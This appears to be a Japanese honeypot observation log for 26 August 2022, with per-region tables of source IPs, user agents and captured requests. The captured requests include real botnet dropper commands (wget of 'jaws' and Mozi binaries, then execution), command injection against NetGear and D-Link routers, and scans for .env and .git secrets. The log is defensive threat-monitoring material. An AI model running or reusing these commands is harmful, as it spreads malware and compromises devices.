ハニーポット(仮) 観測記録 2022/08/26分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
を確認しました。
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
Location:UK
D-link製品の脆弱性を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
Location:SG
D-link製品の脆弱性を狙うアクセス
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://115.195.88.82:34658/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:113 (前日比:-55)
US:総アクセス数:95 (前日比:-9)
UK:総アクセス数:67 (前日比:-25)
SG:総アクセス数:74 (前日比:3)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 34.201.162.77 | United States |
1 | 45.61.187.45 | United States |
1 | 45.83.66.13 | Germany |
1 | 45.119.210.86 | United States |
1 | 49.84.105.91 | China |
1 | 61.141.251.27 | China |
1 | 64.225.1.147 | United States |
1 | 66.63.188.16 | United States |
1 | 91.191.209.202 | Bulgaria |
16 | 95.214.235.205 | Ukraine |
1 | 104.192.3.126 | United States |
3 | 106.75.33.141 | China |
3 | 106.75.81.218 | China |
1 | 107.182.129.107 | United States |
1 | 117.207.225.41 | India |
1 | 125.44.15.185 | China |
1 | 128.14.134.134 | United States |
9 | 135.125.217.54 | France |
8 | 135.125.244.48 | France |
1 | 137.184.126.214 | United States |
7 | 143.110.246.160 | United States |
36 | 150.230.28.248 | United States |
1 | 162.221.192.26 | United States |
2 | 171.22.30.207 | Bulgaria |
1 | 175.107.13.153 | Pakistan |
4 | 179.43.155.171 | Panama |
2 | 183.136.225.35 | China |
1 | 185.220.101.171 | Germany |
1 | 192.241.237.167 | United States |
1 | 197.5.145.64 | Tunisia |
1 | 198.235.24.138 | United States |
1 | 205.185.116.89 | United States |
1 | 216.218.206.96 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
1 | AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9 |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-T537A Build/KOT49H) AppleWebKit/537.36 (KHTML like Gecko) Chrome/35.0.1916.141 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
36 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
3 | Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172 |
35 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x03 |
||
4 | \x16\x03\x01 |
||
36 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /admin-app/.env |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /app/config/dev/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /apps/client/.env |
HTTP/1.1 |
1 | GET | /backups-dup-lite/dup-installer/main.installer.php |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /data/.env |
HTTP/1.1 |
8 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /js../.git/config |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /path/.env |
HTTP/1.1 |
1 | GET | /private/.env |
HTTP/1.1 |
1 | GET | /prod/.env |
HTTP/1.1 |
1 | GET | /pub/.env |
HTTP/1.1 |
2 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /public_html/.env |
HTTP/1.1 |
1 | GET | /public_root/.env |
HTTP/1.1 |
3 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /server/.env |
HTTP/1.1 |
1 | GET | /server/config/.env |
HTTP/1.1 |
1 | GET | /server/laravel/.env |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shop/.env |
HTTP/1.1 |
1 | GET | /site/.env |
HTTP/1.1 |
2 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /sitemaps/.env |
HTTP/1.1 |
1 | GET | /sites/.env |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /sources/.env |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /src/client/mobile/.env |
HTTP/1.1 |
1 | GET | /src/core/tests/dotenv-files/.env |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /static_root/.env |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system-config/.env |
HTTP/1.1 |
1 | GET | /system/.env |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /web/.env |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | /webstatic/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php |
HTTP/1.0 |
1 | HEAD | / |
HTTP/1.0 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.81.221.61 | United States |
1 | 20.9.68.84 | United States |
1 | 20.224.162.53 | United States |
3 | 34.201.162.77 | United States |
9 | 40.117.85.187 | United States |
1 | 45.83.64.18 | Germany |
10 | 54.37.79.75 | France |
1 | 95.161.131.235 | Antigua and Barbuda |
3 | 106.75.28.105 | China |
3 | 106.75.50.185 | China |
1 | 109.206.241.219 | Bulgaria |
2 | 109.237.100.22 | Russia |
1 | 128.1.248.26 | United States |
1 | 147.182.222.68 | United States |
7 | 157.230.45.84 | United States |
1 | 162.142.125.221 | United States |
1 | 165.227.42.178 | United States |
3 | 171.22.30.207 | Bulgaria |
1 | 172.104.242.173 | United States |
1 | 172.105.89.161 | United States |
1 | 182.117.30.169 | China |
1 | 184.105.139.70 | United States |
6 | 185.7.214.117 | Hong Kong |
9 | 185.254.196.223 | Ukraine |
1 | 192.241.236.93 | United States |
1 | 193.118.53.194 | United States |
2 | 194.165.16.76 | Panama |
18 | 195.96.137.7 | United States |
1 | 197.34.186.13 | Egypt |
1 | 197.37.60.67 | Egypt |
1 | 198.235.24.130 | United States |
1 | 209.141.55.120 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
1 | AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9 |
1 | Download Demon/3.5.0.11 |
2 | Hello, world |
1 | Mozilla/5.0 (Linux; Android 11; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 |
3 | Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
1 | Mozilla/5.0 (X11; CrOS aarch64 14388.61.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.107 Safari/537.36 |
31 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
14 | curl/7.54.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
1 | MGLNDD_34.68.118.83_80\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
3 | \x16\x03\x01\x02 |
||
1 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
24 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
4 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
1 | GET | /Portal0000.htm |
HTTP/1.1 |
1 | GET | /R4ua |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /data/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
7 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /index.pl |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /nmaplowercheck1661409718 |
HTTP/1.1 |
1 | GET | /pools |
HTTP/1.1 |
1 | GET | /prod/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /server-status |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
2 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 13.95.140.33 | United States |
1 | 20.14.6.22 | United States |
1 | 20.39.221.204 | United States |
1 | 34.201.162.77 | United States |
18 | 45.61.184.133 | United States |
1 | 45.61.185.39 | United States |
1 | 45.83.64.117 | Germany |
2 | 45.227.254.48 | Belize |
1 | 95.161.131.235 | Antigua and Barbuda |
5 | 103.151.125.91 | Vietnam |
1 | 109.206.241.219 | Bulgaria |
1 | 128.14.133.58 | United States |
7 | 128.199.23.105 | United Kingdom |
1 | 162.142.125.8 | United States |
4 | 171.22.30.207 | Bulgaria |
1 | 175.107.2.174 | Pakistan |
3 | 183.146.30.163 | China |
1 | 184.105.247.254 | United States |
3 | 185.7.214.117 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 191.232.38.25 | Brazil |
1 | 192.241.236.116 | United States |
1 | 194.28.112.135 | Moldova |
1 | 197.246.213.188 | Egypt |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
1 | AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9 |
18 | Go-http-client/1.1 |
2 | Hello, world |
2 | Java/1.8.0_341 |
1 | MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0 |
5 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
8 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.21.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
2 | \x03 |
||
1 | CONNECT | www[.]google[.]es:443 |
HTTP/1.1 |
1 | CONNECT | www[.]paypal[.]com:443 |
HTTP/1.1 |
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
8 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /phpinfo.php |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php |
HTTP/1.0 |
1 | GET | http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php |
HTTP/1.0 |
1 | GET | http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php |
HTTP/1.0 |
1 | HEAD | / |
HTTP/1.0 |
1 | HEAD | / |
HTTP/1.1 |
1 | HEAD | /robots.txt |
HTTP/1.0 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
15 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
9 | POST | /boaform/admin/formPing |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.86.114.176 | United States |
1 | 20.87.73.92 | United States |
1 | 34.201.162.77 | United States |
1 | 41.233.151.233 | Egypt |
1 | 45.56.82.242 | United States |
1 | 45.83.65.10 | Germany |
2 | 45.227.254.26 | Belize |
2 | 45.227.254.49 | Belize |
22 | 51.79.29.48 | Canada |
1 | 59.92.160.47 | India |
1 | 62.233.50.179 | Russia |
1 | 65.49.20.79 | United States |
1 | 66.240.205.34 | United States |
1 | 106.251.118.122 | South Korea |
1 | 109.206.241.219 | Bulgaria |
1 | 115.192.22.233 | China |
1 | 128.14.141.34 | United States |
1 | 141.98.9.13 | Lithuania |
7 | 159.223.136.250 | United States |
1 | 162.142.125.7 | United States |
1 | 162.142.125.210 | United States |
1 | 167.248.133.63 | United States |
1 | 170.210.45.163 | Argentina |
3 | 171.22.30.207 | Bulgaria |
1 | 172.104.242.173 | United States |
3 | 185.7.214.117 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.236.134 | United States |
1 | 193.118.53.210 | United States |
1 | 194.28.112.135 | Moldova |
1 | 205.210.31.140 | United States |
1 | 221.212.178.100 | China |
1 | 222.188.169.251 | China |
1 | 223.149.242.39 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
17 | - |
1 | Hakai/2.0 |
1 | Hello, World |
2 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
31 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | VLC/3.0.8 LibVLC/3.0.8 |
1 | python-requests/2.21.0 |
1 | python-requests/2.27.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
1 | MGLNDD_13.67.44.234_80 |
||
6 | \x03 |
||
2 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
32 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /c/version.js |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http[:]//134[.]195[.]138[.]33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]92[.]160[.]47:45186/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]195[.]88[.]82:34658/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
3 | PRI | * |
HTTP/2.0 |